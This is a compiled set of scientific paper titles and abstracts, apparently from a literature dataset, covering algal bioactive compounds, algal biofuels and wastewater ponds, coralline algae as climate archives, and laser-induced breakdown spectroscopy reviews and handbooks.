Activity of Extracts and Compounds from Marine Algae paper_content: In recent years, the elucidation of novel bioactive substances from different marine organisms has been gaining importance rapidly, not only in research and publications but also in controlled clinical studies of natural product-derived substances. They offer important leads for the development of antiviral drugs against viral infections caused by human immunodeficiency virus type 1 (HIV-1). Regarding this issue, numerous anti-HIV-1 therapeutic agents from marine resources have been reported for their potential medical application as novel functional ingredients in anti-HIV therapy. In particular, marine macroalgae have attracted much attention as a reliable source of potential anti-HIV compounds. To date, several types of compounds such as tannins, polysaccharides, lectins, and derivatives have been isolated, identified, and reported to possess significant anti-HIV-1 activity. --- paper_title: Enhancing biomass energy yield from pilot-scale high rate algal ponds with recycling. paper_content: This paper investigates the effect of recycling on biomass energy yield in High Rate Algal Ponds (HRAPs). Two 8 m³ pilot-scale HRAPs treating primary settled sewage were operated in parallel and monitored over a 2-year period. Volatile suspended solids were measured from both HRAPs and their gravity settlers to determine biomass productivity and harvest efficiency. The energy content of the biomass was also measured.
Multiplying biomass productivity and harvest efficiency gives the 'harvestable biomass productivity' and multiplying this by the energy content defines the actual 'biomass energy yield'. In Year 1, algal recycling was implemented in one of the ponds (HRAPr) and improved harvestable biomass productivity by 58% compared with the control (HRAPc) without recycling (HRAPr: 9.2 g/m²/d; HRAPc: 5.8 g/m²/d). The energy content of the biomass grown in HRAPr, which was dominated by Pediastrum boryanum, was 25% higher than that of the control HRAPc, which contained a mixed culture of 4-5 different algae (HRAPr: 21.5 kJ/g; HRAPc: 18.6 kJ/g). In Year 2, HRAPc was then seeded with the biomass harvested from the P. boryanum-dominated HRAPr. This had the effect of shifting algal dominance from 89% Dictyosphaerium sp. (which is poorly-settleable) to over 90% P. boryanum in 5 months. Operation of this pond was then switched to recycling its own harvested biomass, which maintained P. boryanum dominance for the rest of Year 2. This result confirms, for the first time in the literature, that species control is possible for similarly sized co-occurring algal colonies in outdoor HRAPs by algal recycling. With regard to the overall improvement in biomass energy yield, which is a critical parameter in the context of algal cultivation for biofuels, the combined improvements that recycling triggered in biomass productivity, harvest efficiency and energy content enhanced the harvested biomass energy yield by 66% (HRAPr: 195 kJ/m²/day; HRAPc: 118 kJ/m²/day). --- paper_title: Microalgae as a raw material for biofuels production paper_content: Biofuels demand is unquestionable in order to reduce gaseous emissions (fossil CO₂, nitrogen and sulfur oxides) and their purported greenhouse, climate change and global warming effects, to face the frequent oil supply crises, as a way to help non-fossil fuel producer countries to reduce energy dependence, contributing to security of supply, promoting environmental sustainability and meeting the EU target of at least 10% biofuels in the transport sector by 2020. Biodiesel is usually produced from oleaginous crops, such as rapeseed, soybean, sunflower and palm. However, microalgae can be a suitable alternative feedstock for next generation biofuels because certain species contain high amounts of oil, which could be extracted, processed and refined into transportation fuels using currently available technology; they have fast growth rates, permit the use of non-arable land and non-potable water, use far less water and do not displace food crop cultures; their production is not seasonal and they can be harvested daily. The screening of microalgae (Chlorella vulgaris, Spirulina maxima, Nannochloropsis sp., Neochloris oleabundans, Scenedesmus obliquus and Dunaliella tertiolecta) was done in order to choose the best one(s), in terms of quantity and quality, as an oil source for biofuel production. Neochloris oleabundans (a freshwater microalga) and Nannochloropsis sp. (a marine microalga) proved to be suitable as raw materials for biofuel production, due to their high oil content (29.0 and 28.7%, respectively). Both microalgae, when grown under nitrogen shortage, show a great increase (approximately 50%) in oil quantity. If the purpose is to produce biodiesel only from one species, Scenedesmus obliquus presents the most adequate fatty acid profile, namely in terms of linolenic and other polyunsaturated fatty acids.
However, the microalgae Neochloris oleabundans, Nannochloropsis sp. and Dunaliella tertiolecta can also be used if associated with other microalgal oils and/or vegetable oils. --- paper_title: Constraints to commercialization of algal fuels. paper_content: Production of algal crude oil has been achieved in various pilot scale facilities, but whether algal fuels can be produced in sufficient quantity to meaningfully displace petroleum fuels has been largely overlooked. Limitations to commercialization of algal fuels need to be understood and addressed for any future commercialization. This review identifies the major constraints to commercialization of transport fuels from microalgae. Algae-derived fuels are expensive compared to petroleum-derived fuels, but this could change. Unfortunately, improved economics of production are not sufficient for an environmentally sustainable production, or its large scale feasibility. A low-cost point supply of concentrated carbon dioxide colocated with the other essential resources is necessary for producing algal fuels. An insufficiency of concentrated carbon dioxide is actually a major impediment to any substantial production of algal fuels. Sustainability of production requires the development of an ability to almost fully recycle the phosphorus and nitrogen nutrients that are necessary for algae culture. Development of a nitrogen biofixation ability to support production of algal fuels ought to be an important long term objective. At sufficiently large scale, a limited supply of freshwater will pose a significant limitation to production even if marine algae are used. Processes for recovering energy from the algal biomass left after the extraction of oil are required for achieving a net positive energy balance in the algal fuel oil. The near term outlook for widespread use of algal fuels appears bleak, but fuels for niche applications such as in aviation may be likely in the medium term. Genetic and metabolic engineering of microalgae to boost production of fuel oil and ease its recovery are essential for commercialization of algal fuels. Algae will need to be genetically modified for improved photosynthetic efficiency in the long term. --- paper_title: Optimization of light use efficiency for biofuel production in algae. paper_content: A major challenge for the coming decades is the development of competitive renewable energy sources, which are urgently needed to compensate for finite fossil fuel reserves and to reduce greenhouse gas emissions. Among the different possibilities currently under investigation is the exploitation of unicellular algae for the production of biofuels, and biodiesel in particular. Some algae species have the ability to accumulate large amounts of lipids within their cells, which can be exploited as feedstock for the production of biodiesel. Strong research efforts are however still needed to fulfill this potential and optimize cultivation systems and biomass harvesting. Light provides the energy supporting algae growth, and the available radiation must be exploited with the highest possible efficiency to optimize productivity and make large-scale microalgae cultivation energetically and economically sustainable. Investigation of the molecular bases influencing light use efficiency is thus seminal for the success of this biotechnology.
In this work factors influencing light use efficiency in algal biomass production are reviewed, focusing on how algae genetic engineering and control of light environment within photobioreactors can improve the productivity of large scale cultivation systems. --- paper_title: Coralline algal growth-increment widths archive North Atlantic climate variability paper_content: Over the past decade coralline algae have increasingly been used as archives of paleoclimate information. Encrusting coralline algae, which deposit annual growth increments in a high Mg-calcite skeleton, are amongst the longest-lived shallow marine organisms. In fact, a live-collected plant has recently been shown to have lived for at least 850 years based on radiometric dating. While a number of investigations have successfully used geochemical information of coralline algal skeletons to reconstruct sea surface temperatures, less attention has been paid to employ growth increment widths as a temperature proxy. Here we explore the relationship between growth and environmental parameters in Clathromorphum compactum collected in the subarctic Northwestern Atlantic. Results indicate that growth-increment widths of individual plants are poorly correlated with instrumental sea surface temperatures (SST). However, an averaged record of multiple growth increment-width time series from a regional network of C. compactum specimens up to 800 km apart reveals strong correlations with annual instrumental SST since 1950. Hence, similar to methods applied in dendrochronology, averaging of multiple sclerochronological records of coralline algae provides accurate climate information. A 115-year growth-increment width master chronology created from modern-collected and museum specimens is highly correlated to multidecadal variability seen in North Atlantic sea surface temperatures. Positive changes in algal growth anomalies record the well-documented regime shift and warming in the northwestern Atlantic during the 1990s. Large positive changes in algal growth anomalies were also present in the 1920s and 1930s, indicating that the impact of a concurrent large-scale regime shift throughout the North Atlantic was more strongly felt in the subarctic Northwestern Atlantic than previously thought, and may have even exceeded the 1990s event with respect to the magnitude of the warming. --- paper_title: Structural similarities of fucoidans from brown algae Silvetia babingtonii and Fucus evanescens, determined by tandem MALDI-TOF mass spectrometry. paper_content: Rapid mass spectrometric investigation of oligosaccharides, obtained by autohydrolysis of fucoidans from brown algae Silvetia babingtonii and Fucus evanescens (Fucales, Phaeophyceae) has shown both similarities and differences in structural features/sulfation pattern of their fragments, obtained in the same conditions. Tandem MALDI-TOF MS of fucooligosaccharides with even DP (degree of polymerization) was close to that observed for fucoidan from F. evanescens. Slight differences in tandem mass spectra of fragments with odd DP indicated, probably, sulfation at C-3 (instead of C-2 in F. evanescens) of some (1→4)-linked α-L-Fucp residues and/or the presence of short blocks, built up of (1→3)-linked α-L-Fucp residues. 
--- paper_title: Lipid extracts from different algal species: ¹H and ¹³C-NMR spectroscopic studies as a new tool to screen differences in the composition of fatty acids, sterols and carotenoids paper_content: One- and two-dimensional ¹H- and ¹³C-NMR spectra of lipid extracts from Ulva rigida, Gracilaria longa, Fucus virsoides and Codium tomentosum collected in the northern Adriatic Sea allowed screening of the content of fatty acid chains, carotenoids, free and acylated cholesterol and chlorophylls. The carotenoid-to-polyunsaturated fatty acid molar ratio was taken as a comparison parameter in samples of Ulva rigida collected in different loci and seasons; the value was markedly higher in samples from the Lagoon of Venice than from marine coastal waters. The total cholesterol concentration was evaluated by ¹H-NMR spectroscopy and similar values were found for all species. Two-dimensional heterocorrelated NMR spectroscopy was shown to give characteristic fingerprints of the lipid extracts from algal samples as regards the content in chlorophylls, unsaturated fatty acids and carotenoids. --- paper_title: Engineering challenges in biodiesel production from microalgae. paper_content: In recent years, the not-too-distant exhaustion of fossil fuels has become apparent. Apart from this, the combustion of fossil fuels leads to environmental concerns, the emission of greenhouse gases and issues with global warming and health problems. Production of biodiesel from microalgae may represent an attractive solution to the above-mentioned problems, and can offer a renewable source of fuel with fewer pollutants. This review presents a compilation of engineering challenges related to microalgae as a source of biodiesel. Advantages and current limitations for biodiesel production are discussed; some aspects of algal cell biology, with emphasis on cell wall composition (as it represents a barrier to fatty acid extraction) and lipid droplets, are also presented. In addition, recent advances in the different stages of the manufacturing process are included, starting from strain selection and finishing with the processing of fatty acids into biodiesel. --- paper_title: Wastewater treatment high rate algal ponds for biofuel production. paper_content: While research and development of algal biofuels are currently receiving much interest and funding, they are still not commercially viable at today's fossil fuel prices. However, a niche opportunity may exist where algae are grown as a by-product of high rate algal ponds (HRAPs) operated for wastewater treatment. In addition to significantly better economics, algal biofuel production from wastewater treatment HRAPs has a much smaller environmental footprint compared to commercial algal production HRAPs which consume freshwater and fertilisers. In this paper the critical parameters that limit algal cultivation, production and harvest are reviewed, and practical options that may enhance the net harvestable algal production from wastewater treatment HRAPs, including CO₂ addition, species control, control of grazers and parasites, and bioflocculation, are discussed. --- paper_title: Raman Microspectroscopy of Individual Algal Cells: Sensing Unsaturation of Storage Lipids in vivo paper_content: Algae are becoming a strategic source of fuels, food, feedstocks, and biologically active compounds. This potential has stimulated the development of innovative analytical methods focused on these microorganisms.
Algal lipids are among the most promising potential products for fuels as well as for nutrition. The crucial parameter characterizing the algal lipids is the degree of unsaturation of the constituent fatty acids, quantified by the iodine value. Here we demonstrate the capacity of spatially resolved Raman microspectroscopy to determine the effective iodine value in lipid storage bodies of individual living algal cells. The Raman spectra were collected from three selected algal species immobilized in an agarose gel. Prior to immobilization, the algae were cultivated in the stationary phase, inducing an overproduction of lipids. We employed the characteristic peaks in the Raman scattering spectra at 1,656 cm⁻¹ (cis C═C stretching mode) and 1,445 cm⁻¹ (CH₂ scissoring mode) as the markers defining the ratio of unsaturated-to-saturated carbon-carbon bonds of the fatty acids in the algal lipids. These spectral features were first quantified for pure fatty acids of known iodine value. The resultant calibration curve was then used to calculate the effective iodine value of storage lipids in the living algal cells from their Raman spectra. We demonstrated that the iodine value differs significantly for the three studied algal species. Our spectroscopic estimations of the iodine value were validated using GC-MS measurements and an excellent agreement was found for the Trachydiscus minutus species. A good agreement was also found with the earlier published data on Botryococcus braunii. Thus, we propose that Raman microspectroscopy can become the technique of choice in the rapidly expanding field of algal biotechnology. --- paper_title: Use of LIDAR in landslide investigations: a review paper_content: This paper presents a short history of the appraisal of laser scanner technologies in geosciences used for imaging relief by high-resolution digital elevation models (HRDEMs) or 3D models. A general overview of light detection and ranging (LIDAR) techniques applied to landslides is given, followed by a review of different applications of LIDAR for landslides, rockfalls and debris flows. These applications are classified as: (1) Detection and characterization of mass movements; (2) Hazard assessment and susceptibility mapping; (3) Modelling; (4) Monitoring. This review emphasizes how LIDAR-derived HRDEMs can be used to investigate any type of landslide. It is clear that such HRDEMs are not yet a common tool for landslide investigations, but this technique has opened new domains of applications that still have to be developed. --- paper_title: Coralline algal Barium as indicator for 20th century northwestern North Atlantic surface ocean freshwater variability paper_content: During the past decades, climate and freshwater dynamics in the northwestern North Atlantic have undergone major changes. Large-scale freshening episodes, related to polar freshwater pulses, have had a strong influence on ocean variability in this climatically important region. However, little is known about variability before 1950, mainly due to the lack of long-term high-resolution marine proxy archives. Here we present the first multidecadal-length records of annually resolved Ba/Ca variations from Northwest Atlantic coralline algae. We observe positive relationships between algal Ba/Ca ratios from two Newfoundland sites and salinity observations back to 1950. Both records capture episodic multi-year freshening events during the 20th century.
Variability in algal Ba/Ca is sensitive to freshwater-induced changes in upper ocean stratification, which affect the transport of cold, Ba-enriched deep waters onto the shelf (highly stratified equals less Ba/Ca). Algal Ba/Ca ratios therefore may serve as a new resource for reconstructing past surface ocean freshwater changes. --- paper_title: Anticancer compounds from marine macroalgae and their application as medicinal foods. paper_content: Cancer is one of the most challenging medical conditions and needs a proper therapeutic approach for its management with fewer side effects. Until now, many of the phytochemicals of terrestrial origin have been assessed for their anticancer ability, and a few of them are in clinical trials too. However, the marine environment has also been a great resource that harbors taxonomically diverse life forms and serves as a storehouse for several biologically beneficial metabolites. Hitherto, many metabolites that have exhibited excellent biological activities, especially as anticancer agents, have been isolated from marine biomasses. In particular, marine macroalgae, which are considered dietary constituents in the Pacific Asian region, have become chief resources for their unparalleled and unique metabolites, such as sulfated polysaccharides (SPs) and phlorotannins, and for their ability to reduce the risk of cancer and its related diseases. In this chapter, we have discussed the anticancer activities of marine algae-derived SPs, phlorotannins, and carotenoids and the possibilities of marine algae as potential medicinal foods in the management of cancer. --- paper_title: Use of algae as biofuel sources paper_content: The aim of this study is to investigate algae production technologies such as open, closed and hybrid systems, production costs, and algal energy conversions. Liquid biofuels are alternative fuels promoted for their potential to reduce dependence on fossil fuel imports. Biofuel production costs can vary widely by feedstock, conversion process, scale of production and region. Algae will become the most important biofuel source in the near future. Microalgae appear to be the only source of renewable biodiesel that is capable of meeting the global demand for transport fuels. Microalgae can be converted to bio-oil, bioethanol, bio-hydrogen and biomethane via thermochemical and biochemical methods. Microalgae are theoretically a very promising source of biodiesel. --- paper_title: Sustainability of algal biofuel production using integrated renewable energy park (IREP) and algal biorefinery approach paper_content: Algal biomass can provide a viable third-generation feedstock for liquid transportation fuel. However, for a mature commercial industry to develop, sustainability as well as technological and economic issues pertinent to the algal biofuel sector must be addressed first. This viewpoint focuses on three integrated approaches laid out to meet these challenges. Firstly, an integrated algal biorefinery for sequential biomass processing for multiple high-value products is delineated to bring financial sustainability to algal biofuel production units. Secondly, an integrated renewable energy park (IREP) approach is proposed for amalgamating various renewable energy industries established in different locations.
This would aid in synergistic and efficient electricity and liquid biofuel production with zero net carbon emissions, while obviating numerous sustainability issues such as the productive use of agricultural land, water, and fossil fuels. A 'renewable energy corridor' in the United States, rich in the multiple energy sources needed for algal biofuel production and suitable for deploying IREPs, is also illustrated. Finally, the integration of various industries with the algal biofuel sector can bring a multitude of sustainable deliverables to society, such as a renewable supply of cheap protein supplements, health products and aquafeed ingredients. The benefits, challenges, and policy needs of the IREP approach are also discussed. --- paper_title: Optical Algal Biosensor using Alkaline Phosphatase for Determination of Heavy Metals paper_content: A biosensor is constructed to detect heavy metals from inhibition of alkaline phosphatase (AP) present on the external membrane of Chlorella vulgaris microalgae. The microalgal cells are immobilized on removable membranes placed in front of the tip of an optical fiber bundle inside a homemade microcell. C. vulgaris was cultivated in the laboratory and its alkaline phosphatase activity is strongly inhibited in the presence of heavy metals. This property has been used for the determination of those toxic compounds. --- paper_title: Comparing several atomic spectrometric methods to the super stars: special emphasis on laser induced breakdown spectrometry, LIBS, a future super star paper_content: The "super stars" of analytical atomic spectrometry are electrothermal atomization-atomic absorption spectrometry (ETA-AAS), inductively coupled plasma-atomic emission spectrometry (ICP-AES) and inductively coupled plasma-mass spectrometry (ICP-MS). Many other atomic spectrometric methods have been used to determine levels of elements present in solid, liquid and gaseous samples, but in most cases these other methods are inferior to the big three super star methods. The other atomic methods include glow discharge emission, absorption and mass spectrometric methods, laser-excited fluorescence emission and ionization methods, and flame and microwave plasma emission and mass spectrometric methods. These "lesser" methods will be compared to the "super star" methods based on a number of figures of merit, including detection power, selectivity, multi-element capability, cost, applications, and "age" of the methods. The "age" of the method will be determined by a modification of the well-known Laitinen "Seven Ages of an Analytical Method" (H.A. Laitinen, Anal. Chem., 1973, 45, 2305). Calculations will show that certain methods are capable of single-atom detection, including several atomic absorption methods, as well as laser atomic ionization and fluorescence methods. The comparison of methods will indicate why the "super stars" of atomic spectrometric methods will continue to retain their status and what must be done for the lesser atomic methods to approach "super star" status. Certainly most of the lesser atomic spectrometric methods will have a limited place in the analytical arena. Because of the wide current interest and research activity, special emphasis will be placed on the technique of laser induced breakdown spectrometry (LIBS). Its current status and future developments will therefore be reviewed.
--- paper_title: Potential for green microalgae to produce hydrogen, pharmaceuticals and other high value products in a combined process paper_content: Green microalgae have for several decades been produced for commercial exploitation, with applications ranging from health food for human consumption, aquaculture and animal feed, to coloring agents, cosmetics and others. Several products from green algae which are used today consist of secondary metabolites that can be extracted from the algal biomass. The best known examples are the carotenoids astaxanthin and β-carotene, which are used as coloring agents and for health-promoting purposes. Many species of green algae are able to produce valuable metabolites for different uses; examples are antioxidants, several different carotenoids, polyunsaturated fatty acids, vitamins, anticancer and antiviral drugs. In many cases, these substances are secondary metabolites that are produced when the algae are exposed to stress conditions linked to nutrient deprivation, light intensity, temperature, salinity and pH. In other cases, the metabolites have been detected in algae grown under optimal conditions, and little is known about optimization of the production of each product, or the effects of stress conditions on their production. Some green algae have shown the ability to produce significant amounts of hydrogen gas during sulfur deprivation, a process which is currently studied extensively worldwide. At the moment, the majority of research in this field has focused on the model organism Chlamydomonas reinhardtii, but other species of green algae also have this ability. Currently there is little information available regarding the possibility of producing hydrogen and other valuable metabolites in the same process. This study aims to explore which stress conditions are known to induce the production of different valuable products in comparison to stress reactions leading to hydrogen production. Wild-type species of green microalgae with a known ability to produce high amounts of certain valuable metabolites are listed and linked to species with the ability to produce hydrogen under general anaerobic conditions and during sulfur deprivation. Species used today for commercial purposes are also described. This information is analyzed in order to form a basis for selection of wild-type species for a future multi-step process, where hydrogen production from solar energy is combined with the production of valuable metabolites and other commercial uses of the algal biomass. --- paper_title: Dual role of microalgae: Phycoremediation of domestic wastewater and biomass production for sustainable biofuels production paper_content: Global threats of fuel shortages in the near future and climate change due to greenhouse gas emissions are posing serious challenges, and hence it is imperative to explore sustainable means of averting the consequences. The dual application of microalgae for phycoremediation and biomass production for sustainable biofuels production is a feasible option. The use of high rate algal ponds (HRAPs) for nutrient removal has been in existence for some decades, though the technology has not been fully harnessed for wastewater treatment. Therefore this paper discusses current knowledge regarding wastewater treatment using HRAPs and microalgal biomass production techniques using wastewater streams. The biomass harvesting methods and lipid extraction protocols are discussed in detail.
Finally, the paper discusses biodiesel production via transesterification of the lipids, as well as other biofuels such as biomethane and bioethanol, which are described using the biorefinery approach. --- paper_title: Potential of Near-Infrared Fourier Transform Raman Spectroscopy in Food Analysis paper_content: The 1064-nm excited Fourier transform (FT) Raman spectra have been measured in situ for various foods in order to investigate the potential of near-infrared (NIR) FT-Raman spectroscopy in food analysis. It is demonstrated here that NIR FT-Raman spectroscopy is a very powerful technique for (1) detecting selectively the trace components in foodstuffs, (2) estimating the degree of unsaturation of fatty acids included in foods, (3) investigating the structure of food components, and (4) monitoring changes in the quality of foods. Carotenoids included in foods give two intense bands near 1530 and 1160 cm⁻¹ via the pre-resonance Raman effect in the NIR FT-Raman spectra, and therefore, the NIR FT-Raman technique can be employed to detect them nondestructively. Foods consisting largely of lipids such as oils, tallow, and butter show bands near 1658 and 1443 cm⁻¹ due to C=C stretching modes of cis unsaturated fatty acid parts and CH₂ scissoring modes of saturated fatty acid parts, respectively. It has been found that there is a linear correlation for various kinds of lipid-containing foods between the iodine value (number) and the intensity ratio of the two bands at 1658 and 1443 cm⁻¹ (I₁₆₅₈/I₁₄₄₃), indicating that the ratio can be used as a practical indicator for estimating the unsaturation level of a wide range of lipid-containing foods. A comparison of the Raman spectra of raw and boiled egg white shows that the amide I band shifts from 1666 to 1677 cm⁻¹ and the intensity of the amide III band at 1275 cm⁻¹ decreases upon boiling. These observations indicate that most α-helix structure changes into unordered structure in the proteins constituting egg white upon boiling. The NIR FT-Raman spectrum of old-leaf (about one year old) Japanese tea has been compared with that of its new leaf. The intensity ratio of the two bands at 1529 and 1446 cm⁻¹ (I₁₅₂₉/I₁₄₄₆), assignable to carotenoids and proteins, respectively, is considerably smaller in the former than in the latter, indicating that the ratio is useful for monitoring changes in the quality of Japanese tea. --- paper_title: Trace elemental analysis by laser-induced breakdown spectroscopy—Biological applications paper_content: Laser-Induced Breakdown Spectroscopy (LIBS) is a sensitive optical technique capable of fast multi-elemental analysis of solid, gaseous and liquid samples. Since the late 1980s LIBS has become visible in the analytical atomic spectroscopy scene, and its applications have been developed continuously since then. In this paper, the use of LIBS for trace element determination in different matrices is reviewed. The main emphasis is on spatially resolved analysis of microbiological, plant and animal samples. --- paper_title: Laser-induced breakdown spectroscopy (LIBS): an overview of recent progress and future potential for biomedical applications. paper_content: The recent progress made in developing laser-induced breakdown spectroscopy (LIBS) has transformed LIBS from an elemental analysis technique to one that can be applied for the reagentless analysis of molecularly complex biological materials or clinical specimens.
Rapid advances in the LIBS technology have spawned a growing number of recently published articles in peer-reviewed journals which have consistently demonstrated the capability of LIBS to rapidly detect, biochemically characterize and analyse, and/or accurately identify various biological, biomedical or clinical samples. These analyses are inherently real-time, require no sample preparation, and offer high sensitivity and specificity. This overview of the biomedical applications of LIBS is meant to summarize the research that has been performed to date, as well as to suggest to health care providers several possible specific future applications which, if successfully implemented, would be significantly beneficial to humankind. --- paper_title: Handbook of Laser-Induced Breakdown Spectroscopy paper_content: Foreword. Preface. Acronyms, Constants, and Symbols. 1. History. 1.1 Atomic optical emission spectrochemistry (OES). 1.2 Laser-induced breakdown spectroscopy (LIBS). 1.3 LIBS History 1960-1980. 1.4 LIBS History 1980-1990. 1.5 LIBS History 1990-2000. 1.6 Active Areas of Investigation, 2000-2002. References. 2. Basics of the LIBS plasma. 2.1 LIBS plasma fundamentals. 2.2 Laser-induced breakdown. 2.3 Laser ablation. 2.4 Double or multiple pulse LIBS. 2.5 Summary. References. 3. Apparatus fundamentals. 3.1 Basic LIBS apparatus. 3.2 Lasers. 3.3 Optical systems. 3.4 Methods of spectral resolution. 3.5 Detectors. 3.6 Detection system calibration. 3.7 Timing considerations. 3.8 Methods of LIBS deployment. References. 4. Determining LIBS analytical figures-of-merit. 4.1 Introduction. 4.2 Basics of LIBS measurements. 4.3 Precision. 4.4 Calibration. 4.5 Detection limit. References. 5. Qualitative LIBS Analysis. 5.1 Identifying elements. 5.2 Material identification. 5.3 Process control. References. 6. Quantitative LIBS Analysis. 6.1 Introduction. 6.2 Geometric sampling parameters. 6.3 Other sampling considerations. 6.4 Particle size. 6.5 Use of internal standardization. 6.6 Chemical matrix effects. 6.7 Example of LIBS measurement: impurities in lithium solutions. 6.8 Reported figures of merit for LIBS measurements. 6.9 Conclusions. References. 7. Remote LIBS measurements. 7.1 Introduction. 7.2 Conventional open path LIBS. 7.3 Stand-off LIBS using femtosecond pulses. 7.4 Fiber optic LIBS. References. 8.
Examples of recent LIBS fundamental research, instruments and novel applications. 8.1 Introduction. 8.2 fundamentals. 8.3 calibration-free LIBS. 8.4 laser and spectrometer advances. 8.5 surface analysis. 8.6 Double pulse studies and applications. 8.7 Steel applications. 8.8 libs for biological applications. 8.9 nuclear reactor applications. 8.10 LIBS for space applications. References. 9. THE FUTURE OF LIBS. 9.1 Introduction. 9.2 Expanding the understanding and capability of the libs process. 9.3 Widening the universe of libs applications. 9.4 Factors that will speed the commercialization of Libs. 9.5 conclusion. References. APPENDIX A: Safety Considerations in LIBS. A.1. safety plans. A.2 Laser Safety. A.3 Generation of Aerosols. A.4 laser pulse induced ignition. APPENDIX B: LIBS Application Matrix. APPENDIX C: LIBS Detection Limits. C.1 detection limits from the literature. C.2 uniform detection limits. APPENDIX D: Major LIBS References. Index. --- paper_title: Laser-Induced Breakdown Spectroscopy (LIBS), Part I: Review of Basic Diagnostics and Plasma—Particle Interactions: Still-Challenging Issues within the Analytical Plasma Community paper_content: Laser-induced breakdown spectroscopy (LIBS) has become a very popular analytical method in the last decade in view of some of its unique features such as applicability to any type of sample, practically no sample preparation, remote sensing capability, and speed of analysis. The technique has a remarkably wide applicability in many fields, and the number of applications is still growing. From an analytical point of view, the quantitative aspects of LIBS may be considered its Achilles' heel, first due to the complex nature of the laser-sample interaction processes, which depend upon both the laser characteristics and the sample material properties, and second due to the plasma-particle interaction processes, which are space and time dependent. Together, these may cause undesirable matrix effects. Ways of alleviating these problems rely upon the description of the plasma excitation-ionization processes through the use of classical equilibrium relations and therefore on the assumption that the laser-induced plasma is in local thermodynamic equilibrium (LTE). Even in this case, the transient nature of the plasma and its spatial inhomogeneity need to be considered and overcome in order to justify the theoretical assumptions made. This first article focuses on the basic diagnostics aspects and presents a review of the past and recent LIBS literature pertinent to this topic. Previous research on non-laser-based plasma literature, and the resulting knowledge, is also emphasized. The aim is, on one hand, to make the readers aware of such knowledge and on the other hand to trigger the interest of the LIBS community, as well as the larger analytical plasma community, in attempting some diagnostic approaches that have not yet been fully exploited in LIBS. --- paper_title: Laser-Induced Breakdown Spectroscopy: Fundamentals and Applications paper_content: Introduction.- Laser-induced breakdown spectroscopy.- Process parameters.- Instrumental components.- Evaporation and plasma generation.- Multiple-pulses for LIBS.- Material ablation.- Plasma dynamics and plasma parameters.- Plasma emission.- Modeling of plasma emission.- Quantitative analysis.- Combination of LIBS and LIF.- Bulk analysis of metallic alloys.- Bulk analysis of non-conducting materials.- Spatially resolved analysis.- Depth profiling.- LIBS instruments.- Industrial applications. 
--- paper_title: The development of fieldable laser-induced breakdown spectrometer: No limits on the horizon paper_content: In this review, new trends in the development of fieldable instrumentation based on laser-induced breakdown spectroscopy (LIBS) and its recent applications are presented. Depending on the LIBS configuration we will distinguish between portable, remote and stand-off instruments. Moreover, the development of portable systems gives greater flexibility and also increases the range of LIBS applications. In general, portable instruments are employed in close-contact applications like immovable artworks, contaminated soils and environmental diagnostics, while remote and stand-off instruments are normally used in analytical applications at distances where access to the sample is difficult or hazardous. Although remote and stand-off instruments are both used for chemical analysis at distances, the instrumental configurations are completely different. In remote analysis, an optical fiber is employed to deliver the laser energy over a certain distance. This approach has usually been restricted to industrial applications, bulk analysis in water, geological measurements and chemical analysis at nuclear stations. In the case of stand-off applications, the laser beam and the returning plasma light are transmitted in an open-path configuration. In this article we also discuss the instrumental requirements in the design of remote and stand-off instruments. --- paper_title: Characterization of laser induced plasmas by optical emission spectroscopy: A review of experiments and methods paper_content: Advances in characterization of laser induced plasmas by optical emission spectroscopy are reviewed in this article.
The review is focused on the progress achieved in the determination of the physical parameters characteristic of the plasma, such as electron density, temperature and densities of atoms and ions. The experimental issues important for characterization by optical emission spectroscopy, as well as the different measurement methods are discussed. The main assumptions of the methods, namely the optically thin emission of spectral lines and the existence of local thermodynamic equilibrium in the plasma, are evaluated. For dense and inhomogeneous sources of radiation such as laser induced plasmas, the characterization methods are classified in terms of the optical depth and the spatial resolution of the emission used for the measurements. The review deals firstly with optically thin spatially integrated measurements. Next, local measurements and characterization under conditions that are not optically thin are discussed. Two tables are included that provide reference to the works reporting measurements of electron density and temperature of laser induced plasmas generated with diverse samples. --- paper_title: Laser-induced breakdown spectroscopy (LIBS): fundamentals and applications paper_content: Preface R. Russo and A. W. Miziolek 1. History and fundamentals of LIBS D. A. Cremers and L. J. Radziemski 2. Plasma morphology I. Schechter and V. Bulatov 3. From sample to signal in laser induced breakdown spectroscopy: a complex route to quantitative analysis E. Tognoni, V. Palleschi, M. Corsi, G. Cristoforetti, N. Omenetto, I. Gornushkin, B. W. Smith and J. D. Winefordner 4. Laser induced breakdown in gases: experiments and simulation C. G. Parigger 5. Analysis of aerosols by LIBS U. Panne and D. Hahn 6. Chemical imaging of surfaces using LIBS J. M. Vadillo and J. J. Laserna 7. Biomedical applications of LIBS H. H. Telle and O. Samek 8. LIBS for the analysis of pharmaceutical materials S. Bechard and Y. Mouget 9. Cultural heritage applications of LIBS D. Anglos and J. C. Miller 10. Civilian and military environmental contamination studies using LIBS J. P. Singh, F. Y. Yueh, V. N. Rai, R. Harmon, S. Beaton, P. French, F. C. DeLucia, Jr., B. Peterson, K. L. McNesby and A. W. Miziolek 11. Industrial applications of LIBS R. Noll, V. Sturm, M. Stepputat, A. Whitehouse, J. Young and P. Evans 12. Resonance-enhanced LIBS N. H. Cheung 13. Short-pulse LIBS: fundamentals and applications R. E. Russo 14. High-speed, high resolution LIBS using diode-pumped solid state lasers H. Bette and R. Noll 15. LIBS using sequential laser pulses J. Pender, B. Pearman, J. Scaffidi, S. R. Goode and S. M. Angel 16. Micro LIBS technique P. Fichet, J-L. Lacour, D. Menut, P. Mauchien, A. Rivoallan, C. Fabre, J. Dubessy and M-C. Boiron 17. New spectral detectors for LIBS M. Sabsabi and V. Detalle 18. Spark-induced breakdown spectroscopy: a description of an electrically-generated LIBS-like process for elemental analysis of airborne particulates and solid samples A. J. R. Hunter and L. G. Piper. --- paper_title: Remote laser-induced plasma spectrometry for elemental analysis of samples of environmental interest paper_content: Remote laser-induced plasma spectrometry has been demonstrated as a valuable analytical tool both for qualitative inspection and quantitative determinations on environmental samples.
